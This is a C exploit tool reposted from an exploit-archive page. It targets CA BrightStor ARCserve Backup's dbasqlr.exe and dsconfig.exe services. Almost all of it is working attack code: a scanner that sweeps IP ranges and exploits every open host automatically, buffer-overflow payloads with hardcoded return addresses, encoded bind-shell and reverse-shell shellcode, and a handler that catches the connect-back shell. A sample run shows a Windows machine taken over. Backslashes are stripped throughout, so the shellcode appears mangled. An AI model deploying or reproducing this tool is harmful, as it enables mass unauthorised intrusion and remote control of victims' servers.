[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : CA BrightStor ARCserve Backup Auto Scanner / Exploiter
# Published : 2005-08-03
# Author : cybertronic
# Previous Title : Ethereal 10.x AFP Protocol Dissector Remote Format String Exploit
# Next Title : CA BrightStor ARCserve Backup Agent (dbasqlr.exe) Remote Exploit
/*
* 02/20/2005
*
* This is provided as proof-of-concept code only for educational
* purposes and testing by authorized individuals with permission
* to do so.
*
* exploit by : cybertronic
*
* cybertronic[at]gmx[dot]net
*
* This exploits the following vulnerabilities:
*
* Computer Associates BrightStor ARCserve Backup Agent for SQL - dbasqlr.exe
* Computer Associates BrightStor ARCserve Backup Discovery Service - dsconfig.exe
*
* I included a vulnerability scanner, that scans for the bugs mentioned above
* and logs to "scan.log" in working directory.
* You have to adjust the timeout, it works fine on my network with
* usec = 10000: ~10 hosts / sec
*
* some greetz fly to:
* HD Moore - I`ll pay you some drinks, you know what they are for ;)
* houseofdabus
*
* compile: gcc -o greetz_to_ca greetz_to_ca.c
*
* below is a screenshot of scan-mode:
* __ __ _
* _______ __/ /_ ___ _____/ /__________ ____ (_)____
* / ___/ / / / __ / _ / ___/ __/ ___/ __ / __ / / ___/
* / /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__
* ___/__, /_.___/___/_/ __/_/ ____/_/ /_/_/___/
* /____/
*
* --[ exploit by : cybertronic - cybertronic[at]gmx[dot]net
*
* --[ choose
* |
* |--[0] = start scanner
* `--[1] = send some greetings to ca
*
* $ 0
*
* --[ enter IP-range
* |
* |--[start-ip] $ 192.168.2.90
* `--[end-ip ] $ 192.168.2.120
*
* --[ select port to scan for
* |
* |--[ 6070] = dbasqlr
* `--[41523] = dsconfig
*
* $ 6070
*
* --[ I can try to exploit the bug, shall I ?
* |
* |--[0] yes, try it!
* `--[1] no, i`am on my own!
*
* $ 0
*
* --[ select shellcode
* |
* |--[0] = bindshell
* `--[1] = reverseshell
*
* $ 0
*
* oO---[ scanner - scan.log ]---Oo
*
* [192.168.2.90:6070] closed
* [192.168.2.91:6070] closed
* [192.168.2.92:6070] closed
* [192.168.2.93:6070] closed
* [192.168.2.94:6070] closed
* [192.168.2.95:6070] closed
* [192.168.2.96:6070] closed
* [192.168.2.97:6070] closed
* [192.168.2.98:6070] closed
* [192.168.2.99:6070] closed
* [192.168.2.100:6070] closed
* [192.168.2.101:6070] open
*
// the first one is a fake service that was running by accident ( netcat -l -p 6070 )
* oO---[ exploitation ]---Oo
*
* --[ connecting to 192.168.2.101:6070...done!
* --[ exploiting dbasqlr.exe...
* --[ sending packet [ 3288 bytes ]...done!
* --[ sleeping 5 seconds...
* --[ connecting to 192.168.2.101:4444...failed!
*
* [192.168.2.102:6070] open
*
* oO---[ exploitation ]---Oo
*
* --[ connecting to 192.168.2.102:6070...done!
* --[ exploiting dbasqlr.exe...
* --[ sending packet [ 3288 bytes ]...done!
* --[ sleeping 5 seconds...
* --[ connecting to 192.168.2.102:4444...done!
* --[ b0x pwned - h4ve phun
* Microsoft Windows XP [Version 5.1.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* C:WINDOWSsystem32>exit
* exit
* bye bye...
* [192.168.2.103:6070] closed
* [192.168.2.104:6070] closed
* [192.168.2.105:6070] closed
* [192.168.2.106:6070] closed
* [192.168.2.107:6070] closed
* [192.168.2.108:6070] closed
* [192.168.2.109:6070] closed
* [192.168.2.110:6070] closed
* [192.168.2.111:6070] closed
* [192.168.2.112:6070] closed
* [192.168.2.113:6070] closed
* [192.168.2.114:6070] closed
* [192.168.2.115:6070] closed
* [192.168.2.116:6070] closed
* [192.168.2.117:6070] closed
* [192.168.2.118:6070] closed
* [192.168.2.119:6070] closed
* [192.168.2.120:6070] closed
*
* oO---[ scan completed ]---Oo
*
* [ cybertronic @ CA ] #
*
*/
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#include <errno.h>
/*
*
* definitions
*
*/
#define PORT_DBASQLR 6070
#define PORT_DSCONFIG 41523
#define RED "E[31mE[1m"
#define GREEN "E[32mE[1m"
#define YELLOW "E[33mE[1m"
#define BLUE "E[34mE[1m"
#define NORMAL "E[m"
/*
*
* prototypes
*
*/
int connect_to_remote_host ( char* tip, unsigned short tport );
int exploit_dbasqlr ( int s, unsigned long xoredip, unsigned short xoredcbport, int option );
int exploit_dsconfig ( int s, unsigned long xoredip, unsigned short xoredcbport, int option );
int isip ( char *ip );
int is_open ( char* ip, unsigned short tport );
int select_action ();
int select_shellcode ();
int select_vulnerability ();
int shell ( int s, char* tip, unsigned short cbport );
void connect_to_bindshell ( char* tip, unsigned short bport );
void fall_asleep ( int sec );
void header ();
void start_reverse_handler ( int cbport );
void usage ( char* name );
/*********************
* Windows Shellcode *
*********************/
/*
* Type : bind shellcode
* Length: 500 bytes
* Port : 4444 / 0x115c
*
*/
unsigned char bindshell[] =
"xebx19x5ex31xc9x81xe9x89xffxffxffx81x36x80xbfx32"
"x94x81xeexfcxffxffxffxe2xf2xebx05xe8xe2xffxffxff"
"x03x53x06x1fx74x57x75x95x80xbfxbbx92x7fx89x5ax1a"
"xcexb1xdex7cxe1xbex32x94x09xf9x3ax6bxb6xd7x9fx4d"
"x85x71xdaxc6x81xbfx32x1dxc6xb3x5axf8xecxbfx32xfc"
"xb3x8dx1cxf0xe8xc8x41xa6xdfxebxcdxc2x88x36x74x90"
"x7fx89x5axe6x7ex0cx24x7cxadxbex32x94x09xf9x22x6b"
"xb6xd7x4cx4cx62xccxdax8ax81xbfx32x1dxc6xabxcdxe2"
"x84xd7xf9x79x7cx84xdax9ax81xbfx32x1dxc6xa7xcdxe2"
"x84xd7xebx9dx75x12xdax6ax80xbfx32x1dxc6xa3xcdxe2"
"x84xd7x96x8exf0x78xdax7ax80xbfx32x1dxc6x9fxcdxe2"
"x84xd7x96x39xaex56xdax4ax80xbfx32x1dxc6x9bxcdxe2"
"x84xd7xd7xddx06xf6xdax5ax80xbfx32x1dxc6x97xcdxe2"
"x84xd7xd5xedx46xc6xdax2ax80xbfx32x1dxc6x93x01x6b"
"x01x53xa2x95x80xbfx66xfcx81xbex32x94x7fxe9x2axc4"
"xd0xefx62xd4xd0xffx62x6bxd6xa3xb9x4cxd7xe8x5ax96"
"x80xaex6ex1fx4cxd5x24xc5xd3x40x64xb4xd7xecxcdxc2"
"xa4xe8x63xc7x7fxe9x1ax1fx50xd7x57xecxe5xbfx5axf7"
"xedxdbx1cx1dxe6x8fxb1x78xd4x32x0exb0xb3x7fx01x5d"
"x03x7ex27x3fx62x42xf4xd0xa4xafx76x6axc4x9bx0fx1d"
"xd4x9bx7ax1dxd4x9bx7ex1dxd4x9bx62x19xc4x9bx22xc0"
"xd0xeex63xc5xeaxbex63xc5x7fxc9x02xc5x7fxe9x22x1f"
"x4cxd5xcdx6bxb1x40x64x98x0bx77x65x6bxd6x93xcdxc2"
"x94xeax64xf0x21x8fx32x94x80x3axf2xecx8cx34x72x98"
"x0bxcfx2ex39x0bxd7x3ax7fx89x34x72xa0x0bx17x8ax94"
"x80xbfxb9x51xdexe2xf0x90x80xecx67xc2xd7x34x5exb0"
"x98x34x77xa8x0bxebx37xecx83x6axb9xdex98x34x68xb4"
"x83x62xd1xa6xc9x34x06x1fx83x4ax01x6bx7cx8cxf2x38"
"xbax7bx46x93x41x70x3fx97x78x54xc0xafxfcx9bx26xe1"
"x61x34x68xb0x83x62x54x1fx8cxf4xb9xcex9cxbcxefx1f"
"x84x34x31x51x6bxbdx01x54x0bx6ax6dxcaxddxe4xf0x90"
"x80x2fxa2x04";
/*
* Type : connect back shellcode
* Length: 316 bytes
* CBIP : reverseshell[111] ( ^ 0x99999999 )
* CBPort: reverseshell[118] ( ^ 0x9999 )
*
*/
unsigned char reverseshell[] =
"xEBx10x5Bx4Bx33xC9x66xB9x25x01x80x34x0Bx99xE2xFA"
"xEBx05xE8xEBxFFxFFxFFx70x62x99x99x99xC6xFDx38xA9"
"x99x99x99x12xD9x95x12xE9x85x34x12xF1x91x12x6ExF3"
"x9DxC0x71x02x99x99x99x7Bx60xF1xAAxABx99x99xF1xEE"
"xEAxABxC6xCDx66x8Fx12x71xF3x9DxC0x71x1Bx99x99x99"
"x7Bx60x18x75x09x98x99x99xCDxF1x98x98x99x99x66xCF"
"x89xC9xC9xC9xC9xD9xC9xD9xC9x66xCFx8Dx12x41xF1xE6"
"x99x99x98xF1x9Bx99x9Dx4Bx12x55xF3x89xC8xCAx66xCF"
"x81x1Cx59xECxD3xF1xFAxF4xFDx99x10xFFxA9x1Ax75xCD"
"x14xA5xBDxF3x8CxC0x32x7Bx64x5FxDDxBDx89xDDx67xDD"
"xBDxA4x10xC5xBDxD1x10xC5xBDxD5x10xC5xBDxC9x14xDD"
"xBDx89xCDxC9xC8xC8xC8xF3x98xC8xC8x66xEFxA9xC8x66"
"xCFx9Dx12x55xF3x66x66xA8x66xCFx91xCAx66xCFx85x66"
"xCFx95xC8xCFx12xDCxA5x12xCDxB1xE1x9Ax4CxCBx12xEB"
"xB9x9Ax6CxAAx50xD0xD8x34x9Ax5CxAAx42x96x27x89xA3"
"x4FxEDx91x58x52x94x9Ax43xD9x72x68xA2x86xECx7ExC3"
"x12xC3xBDx9Ax44xFFx12x95xD2x12xC3x85x9Ax44x12x9D"
"x12x9Ax5Cx32xC7xC0x5Ax71x99x66x66x66x17xD7x97x75"
"xEBx67x2Ax8Fx34x40x9Cx57x76x57x79xF9x52x74x65xA2"
"x40x90x6Cx34x75x60x33xF9x7ExE0x5FxE0";
unsigned char greetz[] =
"x20x41x54x20x4cx45x41x53x54x20x53x4fx4dx45x20x47"
"x52x45x45x54x5ax20x46x4cx59x20x54x4fx3ax20x48x44"
"x4dx2cx20x54x48x43x2cx20x41x4ex44x20x43x41x20x4f"
"x46x20x43x4fx55x52x53x45x20x3ax29x20x2dx20x43x59"
"x42x45x52x54x52x4fx4ex49x43x20";
/*
*
* structures
*
*/
typedef struct _args {
char* tip;
char* lip;
int tport;
int lport;;
} args;
/*
*
* functions
*
*/
int
connect_to_remote_host ( char* tip, unsigned short tport )
{
int s;
struct sockaddr_in remote_addr;
struct hostent* host_addr;
memset ( &remote_addr, 0x0, sizeof ( remote_addr ) );
if ( ( host_addr = gethostbyname ( tip ) ) == NULL )
{
printf ( "cannot resolve "%s"n", tip );
exit ( 1 );
}
remote_addr.sin_family = AF_INET;
remote_addr.sin_port = htons ( tport );
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "socket failed!n" );
exit ( 1 );
}
printf ( "--[ connecting to %s:%u...", tip, tport );
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
{
printf ( "failed!n" );
exit ( 1 );
}
printf ( "done!n" );
return ( s );
}
int
exploit_dbasqlr ( int s, unsigned long xoredip, unsigned short xoredcbport, int option )
{
unsigned long pushesp = 0x20c0c1ab; //Asbrdcst.dll
char buffer[3289];
bzero ( &buffer, sizeof ( buffer ) );
memset ( buffer, 0x41, sizeof ( buffer ) - 1 );
memcpy ( buffer + 14, greetz, sizeof ( greetz ) - 1 );
memcpy ( buffer + 1337, "x81xc4x54xf2xffxff", 6 ); //good code <-------.
memcpy ( buffer + 3168, ( unsigned char* ) &pushesp, 4 ); // |
memcpy ( buffer + 3172, "xe9xd0xf8xffxff", 5 ); //jmp back 1840 bytes --'
if ( option == 0 )
{
memcpy ( &reverseshell[111], &xoredip, 4);
memcpy ( &reverseshell[118], &xoredcbport, 2);
memcpy ( buffer + 1343, reverseshell, sizeof ( reverseshell ) - 1 );
}
else
memcpy ( buffer + 1343, bindshell, sizeof ( bindshell ) - 1 );
printf ( "--[ exploiting " YELLOW "dbasqlr.exe" NORMAL"...n" );
printf ( "--[ sending packet [ %u bytes ]...", strlen ( buffer ) );
if ( write ( s, buffer, strlen ( buffer ) ) <= 0 )
{
printf ( RED "failed!n" NORMAL);
return ( 1 );
}
printf ( YELLOW "done!n" NORMAL);
sleep ( 1 );
close ( s );
return ( 0 );
}
int
exploit_dsconfig ( int s, unsigned long xoredip, unsigned short xoredcbport, int option )
{
char buffer[4129];
bzero ( &buffer, sizeof ( buffer ) );
memset ( buffer, 0x41, sizeof ( buffer ) - 1 );
buffer[ 0] = 0x9b;
buffer[ 1] = 0x53; //S
buffer[ 2] = 0x45; //E
buffer[ 3] = 0x52; //R
buffer[ 4] = 0x56; //V
buffer[ 5] = 0x49; //I
buffer[ 6] = 0x43; //C
buffer[ 7] = 0x45; //E
buffer[ 8] = 0x50; //P
buffer[ 9] = 0x43; //C
buffer[10] = 0x18;
buffer[11] = 0x01;
buffer[12] = 0x02;
buffer[13] = 0x03;
buffer[14] = 0x04;
buffer[15] = 0x53; //S
buffer[16] = 0x45; //E
buffer[17] = 0x52; //R
buffer[18] = 0x56; //V
buffer[19] = 0x49; //I
buffer[20] = 0x43; //C
buffer[21] = 0x45; //E
buffer[22] = 0x50; //P
buffer[23] = 0x43; //C
buffer[24] = 0x01;
buffer[25] = 0x0c;
buffer[26] = 0x6c;
buffer[27] = 0x93;
buffer[28] = 0xce;
buffer[29] = 0x18;
buffer[30] = 0x18;
memcpy ( buffer + 14, greetz, sizeof ( greetz ) - 1 );
memcpy ( buffer + 1056, "xebx06", 2 );
memcpy ( buffer + 1060, "x14x57x80x23", 4 ); //SEH
if ( option == 0 )
{
memcpy ( &reverseshell[111], &xoredip, 4);
memcpy ( &reverseshell[118], &xoredcbport, 2);
memcpy ( buffer + 1064, reverseshell, sizeof ( reverseshell ) - 1 );
}
else
memcpy ( buffer + 1064, bindshell, sizeof ( bindshell ) - 1 );
printf ( "--[ exploiting " YELLOW "dsconfig.exe" NORMAL "...n" );
printf ( "--[ sending packet [ %u bytes ]...", strlen ( buffer ) );
if ( write ( s, buffer, strlen ( buffer ) ) <= 0 )
{
printf ( RED "failed!n" NORMAL);
return ( 1 );
}
printf ( YELLOW "done!n" NORMAL);
sleep ( 1 );
close ( s );
return ( 0 );
}
int
isip ( char *ip )
{
int a, b, c, d;
if ( !sscanf ( ip, "%d.%d.%d.%d", &a, &b, &c, &d ) )
return ( 0 );
if ( a < 1 )
return ( 0 );
if ( a > 255 )
return 0;
if ( b < 0 )
return 0;
if ( b > 255 )
return 0;
if ( c < 0 )
return 0;
if ( c > 255 )
return 0;
if ( d < 0 )
return 0;
if ( d > 255 )
return 0;
return 1;
}
int
is_open ( char* ip, unsigned short tport )
{
int s, n, error;
int flags;
int sec = 0; //change this for wan
unsigned long usec = 10000; //works fine on my lan
struct sockaddr_in remote_addr;
struct timeval tval;
fd_set rset, wset;
socklen_t len;
memset ( &remote_addr, 0x0, sizeof ( remote_addr ) );
remote_addr.sin_family = AF_INET;
remote_addr.sin_port = htons ( tport );
inet_pton ( AF_INET, ip, &remote_addr.sin_addr );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "socket failed!n" );
exit ( -1 );
}
if ( ( flags = fcntl ( s, F_GETFL, 0 ) ) < 0 )
{
close ( s );
return ( -1 );
}
if ( fcntl ( s, F_SETFL, flags | O_NONBLOCK ) < 0 )
{
close ( s );
return ( -1 );
}
if ( ( n = connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) ) == -1 )
{
if ( errno != EINPROGRESS )
{
close ( s );
return ( -1 );
}
}
if ( n == 0 )
goto done; /* connect completed immediately */
FD_ZERO ( &rset );
FD_SET ( s, &rset );
wset = rset;
tval.tv_sec = sec;
tval.tv_usec = usec;
if ( ( n = select ( s + 1, &rset, &wset, NULL, &tval ) ) == 0 )
{
close ( s ); /* timeout */
errno = ETIMEDOUT;
return ( 1 );
}
if ( FD_ISSET ( s, &rset ) || FD_ISSET ( s, &wset ) )
{
len = sizeof ( error );
if ( getsockopt ( s, SOL_SOCKET, SO_ERROR, &error, &len ) < 0 )
return ( -1 );
}
else
{
printf ( "select failed!n" );
exit ( 1 );
}
done:
if ( fcntl ( s, F_SETFL, flags ) < 0 )
{
close ( s );
return ( -1 );
}
if ( error )
{
close ( s );
errno = error;
return ( -1 );
}
return ( 0 );
}
int
select_action ()
{
int ret;
printf ( "n" );
printf ( "--[ choosen" );
printf ( " |n" );
printf ( " |--" RED "[" NORMAL "0" RED "]" NORMAL " = start scannern" );
printf ( " `--" RED "[" NORMAL "1" RED "]" NORMAL " = send some greetings to can" );
printf ( "n" );
printf ( " $ " );
scanf ( "%d", &ret );
if ( ret != 0 && ret != 1 )
{
printf ( "--[ invalid option!n" );
exit ( 1 );
}
return ( ret );
}
int
select_shellcode ()
{
int ret;
printf ( "n" );
printf ( "--[ select shellcoden" );
printf ( " |n" );
printf ( " |--" RED "[" NORMAL "0" RED "]" NORMAL " = bindshelln" );
printf ( " `--" RED "[" NORMAL "1" RED "]" NORMAL " = reverseshelln" );
printf ( "n" );
printf ( " $ " );
scanf ( "%d", &ret );
if ( ret != 0 && ret != 1 )
{
printf ( "--[ invalid shellcode!n" );
exit ( 1 );
}
return ( ret );
}
int
select_vulnerability ()
{
int ret;
printf ( "n" );
printf ( "--[ select vulnerabilityn" );
printf ( " |n" );
printf ( " |--" RED "[" NORMAL "0" RED "]" NORMAL " = dbasqlrn" );
printf ( " `--" RED "[" NORMAL "1" RED "]" NORMAL " = dsconfign" );
printf ( "n" );
printf ( " $ " );
scanf ( "%d", &ret );
if ( ret != 0 && ret != 1 )
{
printf ( "--[ invalid option!n" );
exit ( 1 );
}
return ( ret );
}
int
shell ( int s, char* tip, unsigned short cbport )
{
int n;
char buffer[2048];
fd_set fd_read;
printf ( "--[" YELLOW " b" NORMAL "0" YELLOW "x " NORMAL "p" YELLOW "w" NORMAL "n" YELLOW "e" NORMAL "d " YELLOW "- " NORMAL "h" YELLOW "4" NORMAL "v" YELLOW "e " NORMAL "p" YELLOW "h" NORMAL "u" YELLOW "n" NORMAL "n" );
FD_ZERO ( &fd_read );
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );
while ( 1 )
{
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );
if ( select ( s + 1, &fd_read, NULL, NULL, NULL ) < 0 )
break;
if ( FD_ISSET ( s, &fd_read ) )
{
if ( ( n = recv ( s, buffer, sizeof ( buffer ), 0 ) ) < 0 )
{
printf ( "bye bye...n" );
return;
}
if ( write ( 1, buffer, n ) < 0 )
{
printf ( "bye bye...n" );
return;
}
}
if ( FD_ISSET ( 0, &fd_read ) )
{
if ( ( n = read ( 0, buffer, sizeof ( buffer ) ) ) < 0 )
{
printf ( "bye bye...n" );
return;
}
if ( send ( s, buffer, n, 0 ) < 0 )
{
printf ( "bye bye...n" );
return;
}
}
usleep(10);
}
}
void
connect_to_bindshell ( char* tip, unsigned short bport )
{
int s;
int sec = 5; // change this for fast targets
struct sockaddr_in remote_addr;
struct hostent* host_addr;
if ( ( host_addr = gethostbyname ( tip ) ) == NULL )
{
fprintf ( stderr, "cannot resolve "%s"n", tip );
exit ( 1 );
}
remote_addr.sin_family = AF_INET;
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
remote_addr.sin_port = htons ( bport );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "socket failed!n" );
exit ( 1 );
}
printf ( "--[ sleeping %d seconds...n", sec );
fall_asleep ( sec );
printf ( "--[ connecting to %s:%u...", tip, bport );
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
{
printf ( RED "failed!nn" NORMAL);
exit ( 1 );
}
printf ( YELLOW "done!n" NORMAL);
shell ( s, tip, bport );
}
void
fall_asleep ( int sec )
{
sleep ( sec );
}
void
header ()
{
printf ( YELLOW " __ __ _ n" );
printf ( " _______ __/ /_ ___ _____/ /__________ ____ (_)____ n" );
printf ( " / ___/ / / / __ \/ _ \/ ___/ __/ ___/ __ \/ __ \/ / ___/ n" );
printf ( "/ /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__ n" );
printf ( "\___/\__, /_.___/\___/_/ \__/_/ \____/_/ /_/_/\___/ n" );
printf ( " /____/ nn" NORMAL );
printf ( "--[ exploit by : cybertronic - cybertronic[at]gmx[dot]netn" );
}
void
parse_arguments ( int argc, char* argv[], args* argp )
{
int i = 0;
while ( ( i = getopt ( argc, argv, "t:l:p:" ) ) != -1 )
{
switch ( i )
{
case 't':
argp->tip = optarg;
break;
case 'l':
argp->lip = optarg;
break;
case 'p':
argp->lport = atoi ( optarg );
break;
case ':':
case '?':
default:
usage ( argv[0] );
}
}
if ( argp->tip == NULL || argp->lip == NULL || argp->lport < 1 || argp->lport > 65535 )
usage ( argv[0] );
}
void
start_reverse_handler ( int cbport )
{
int s1, s2;
struct sockaddr_in cliaddr, servaddr;
socklen_t clilen = sizeof ( cliaddr );
bzero ( &servaddr, sizeof ( servaddr ) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
servaddr.sin_port = htons ( cbport );
printf ( "--[ starting reverse handler [port: %u]...", cbport );
if ( ( s1 = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
{
printf ( "socket failed!n" );
exit ( 1 );
}
bind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
if ( listen ( s1, 1 ) == -1 )
{
printf ( "listen failed!n" );
exit ( 1 );
}
printf ( YELLOW "done!n" NORMAL);
if ( ( s2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )
{
printf ( "accept failed!n" );
exit ( 1 );
}
close ( s1 );
printf ( "--[ incomming connection from:t" YELLOW " %sn" NORMAL, inet_ntoa ( cliaddr.sin_addr ) );
shell ( s2, ( char* ) inet_ntoa ( cliaddr.sin_addr ), cbport );
close ( s2 );
}
void
start_scanner ( args* argp )
{
int i;
int s;
int fd;
int sc;
int option;
int ip1 = 0, a = 0;
int ip2 = 0, b = 0;
int ip3 = 0, c = 0;
int ip4 = 0, d = 0;
int status = 0;
char scan_ip[256];
char end_ip[256];
char line[256];
char system_time[64];
unsigned short port;
unsigned short xoredcbport;
unsigned long BRUTE_DELAY = 100000;
unsigned long MAX_CHILDS = 40;
unsigned long xoredcbip;
time_t ticks = time ( NULL );
bzero ( &scan_ip, sizeof ( scan_ip ) );
bzero ( &end_ip, sizeof ( end_ip ) );
bzero ( &system_time, sizeof ( system_time ) );
printf ( "n" );
printf ( "--[ enter IP-rangen" );
printf ( " |n" );
printf ( " |--" RED "[" NORMAL "start-ip" RED "]" NORMAL );
printf ( " $ " );
scanf ( "%s", scan_ip );
sscanf ( scan_ip, "%u.%u.%u.%u", &ip1, &ip2, &ip3, &ip4 );
if ( !isip ( scan_ip ) )
{
printf ( "Invalid IP!n" );
exit ( 1 );
}
printf ( " `--" RED "[" NORMAL "end-ip " RED "]" NORMAL );
printf ( " $ " );
scanf ( "%s", end_ip );
sscanf ( end_ip, "%u.%u.%u.%u", &a, &b, &c, &d );
if ( !isip ( end_ip ) )
{
printf ( "Invalid IP!n" );
exit ( 1 );
}
printf ( "n" );
printf ( "--[ select port to scan forn" );
printf ( " |n" );
printf ( " |--" RED "[" NORMAL " 6070" RED "]" NORMAL " = dbasqlrn" );
printf ( " `--" RED "[" NORMAL "41523" RED "]" NORMAL " = dsconfign" );
printf ( "n" );
printf ( " $ " );
scanf ( "%u", &port );
if ( port != 6070 && port != 41523 )
{
printf ( "--[ I`m only scanning for port 6070 and 41523!n" );
exit ( 1 );
}
printf ( "n" );
printf ( "--[ I can try to exploit the bug, shall I ?n" );
printf ( " |n" );
printf ( " |--" RED "[" NORMAL "0" RED "]" NORMAL " yes, try it!n" );
printf ( " `--" RED "[" NORMAL "1" RED "]" NORMAL " no, i`am on my own!n" );
printf ( "n" );
printf ( " $ " );
scanf ( "%u", &option );
if ( option != 0 && option != 1 )
{
printf ( "--[ invalid option!n" );
exit ( 1 );
}
if ( option == 0 )
sc = select_shellcode ();
if ( ( fd = open ( "scan.log", O_CREAT | O_WRONLY | O_APPEND, S_IREAD | S_IWRITE ) ) == -1 )
{
printf ( "open failed!n" );
exit ( 1 );
}
snprintf ( system_time, sizeof ( system_time ) -1, "nDate: %snn", ctime ( &ticks ) );
if ( write ( fd, system_time, strlen ( system_time ) -1 ) <= 0 )
{
printf ( RED "failed!n" NORMAL);
exit ( 1 );
}
printf ( "noO---[ scanner - scan.log ]---Oonn" );
while ( 1 )
{
if ( ip3 > 254 ) { ip3 = 1; ip2++; }
if ( ip2 > 254 ) { ip2 = 1; ip1++; }
if ( ip1 > 254 )
exit ( 0 );
for ( ip4; ip4 < 255; ip4++ )
{
i++;
bzero ( &scan_ip, sizeof ( scan_ip ) );
snprintf ( scan_ip, sizeof ( scan_ip ) -1, "%u.%u.%u.%u", ip1, ip2, ip3, ip4 );
usleep ( BRUTE_DELAY );
switch ( fork () )
{
case 0:
{
switch ( is_open ( scan_ip, port ) )
{
case 0:
{
printf ( "[%s:%d] " GREEN "open" NORMAL "n", scan_ip, port );
bzero ( &line, sizeof ( line ) );
snprintf ( line, sizeof ( line ) -1, "[%s:%d]nn", scan_ip, port );
if ( write ( fd, line, strlen ( line ) -1 ) <= 0 )
{
printf ( RED "failed!n" NORMAL);
exit ( 1 );
}
if ( option == 0 )
{
printf ( "n" );
printf ( "oO---[ exploitation ]---Oon" );
printf ( "n" );
s = connect_to_remote_host ( scan_ip, port );
switch( sc )
{
case 0:
{
if ( port == 6070 )
{
if ( exploit_dbasqlr ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 ) == 1 )
{
printf ( "exploitation failed!n" );
exit ( 1 );
}
connect_to_bindshell ( scan_ip, 4444 );
break;
}
else
{
if ( exploit_dsconfig ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 ) == 1 )
{
printf ( "exploitation failed!n" );
exit ( 1 );
}
connect_to_bindshell ( scan_ip, 4444 );
break;
}
}
case 1:
{
if ( port == 6070 )
{
xoredcbip = inet_addr ( argp->lip ) ^ ( unsigned long ) 0x99999999;
xoredcbport = htons ( argp->lport ) ^ ( unsigned short ) 0x9999;
if ( exploit_dbasqlr ( s, xoredcbip, xoredcbport, 0 ) == 1 )
{
printf ( "exploitation failed!n" );
exit ( 1 );
}
start_reverse_handler ( argp->lport );
break;
}
else
{
xoredcbip = inet_addr ( argp->lip ) ^ ( unsigned long ) 0x99999999;
xoredcbport = htons ( argp->lport ) ^ ( unsigned short ) 0x9999;
if ( exploit_dsconfig ( s, xoredcbip, xoredcbport, 0 ) == 1 )
{
printf ( "exploitation failed!n" );
exit ( 1 );
}
start_reverse_handler ( argp->lport );
break;
}
}
}
}
break;
}
case 1:
printf ( "[%s:%d] " RED "closed" NORMAL "n", scan_ip, port );
break;
default:
printf ( "[%s:%d] " RED "closed" NORMAL "n", scan_ip, port );
break;
}
exit(0);
break;
}
case -1:
{
printf ( "fork failed!n");
exit ( 1 );
break;
}
default:
{
if ( i > MAX_CHILDS - 2 )
{
wait ( &status );
i--;
}
break;
}
}
if ( ip1 == a && ip2 == b && ip3 == c && ip4 == d )
{
close ( fd );
printf ( "noO---[ scan completed ]---Oonn" );
exit ( 0 );
}
}
ip4 = 1;
ip3++;
}
}
void
usage ( char* name )
{
int i;
printf ( "n" );
printf ( "Note: all switches have to be specified!n" );
printf ( "You can choose between bind and cb shellcode later!n" );
printf ( "n" );
printf ( "Usage: %s -t <tip> -l <cbip> -p <cbport>n", name );
printf ( "n" );
exit ( 1 );
}
int
main ( int argc, char* argv[] )
{
int s, action, vuln, sc;
unsigned long xoredcbip;
unsigned short xoredcbport;
args myargs;
system ( "clear" );
header ();
parse_arguments ( argc, argv, &myargs );
if ( !isip ( myargs.tip ) )
{
printf ( "Invalid Target IP!n" );
exit ( 1 );
}
if ( !isip ( myargs.lip ) )
{
printf ( "Invalid Connect Back IP!n" );
exit ( 1 );
}
action = select_action ();
if ( !action )
start_scanner ( &myargs );
vuln = select_vulnerability ();
sc = select_shellcode ();
switch ( vuln )
{
case 0:
{
s = connect_to_remote_host ( myargs.tip, PORT_DBASQLR );
switch( sc )
{
case 0:
{
if ( exploit_dbasqlr ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 ) == 1 )
{
printf ( "exploitation failed!n" );
exit ( 1 );
}
connect_to_bindshell ( myargs.tip, 4444 );
break;
}
case 1:
{
xoredcbip = inet_addr ( myargs.lip ) ^ ( unsigned long ) 0x99999999;
xoredcbport = htons ( myargs.lport ) ^ ( unsigned short ) 0x9999;
if ( exploit_dbasqlr ( s, xoredcbip, xoredcbport, 0 ) == 1 )
{
printf ( "exploitation failed!n" );
exit ( 1 );
}
start_reverse_handler ( myargs.lport );
break;
}
}
break;
}
case 1:
{
s = connect_to_remote_host ( myargs.tip, PORT_DSCONFIG );
switch( sc )
{
case 0:
{
if ( exploit_dsconfig ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 ) == 1 )
{
printf ( "exploitation failed!n" );
exit ( 1 );
}
connect_to_bindshell ( myargs.tip, 4444 );
break;
}
case 1:
{
xoredcbip = inet_addr ( myargs.lip ) ^ ( unsigned long ) 0x99999999;
xoredcbport = htons ( myargs.lport ) ^ ( unsigned short ) 0x9999;
if ( exploit_dsconfig ( s, xoredcbip, xoredcbport, 0 ) == 1 )
{
printf ( "exploitation failed!n" );
exit ( 1 );
}
start_reverse_handler ( myargs.lport );
break;
}
}
break;
}
}
}
// www.Syue.com [2005-08-03]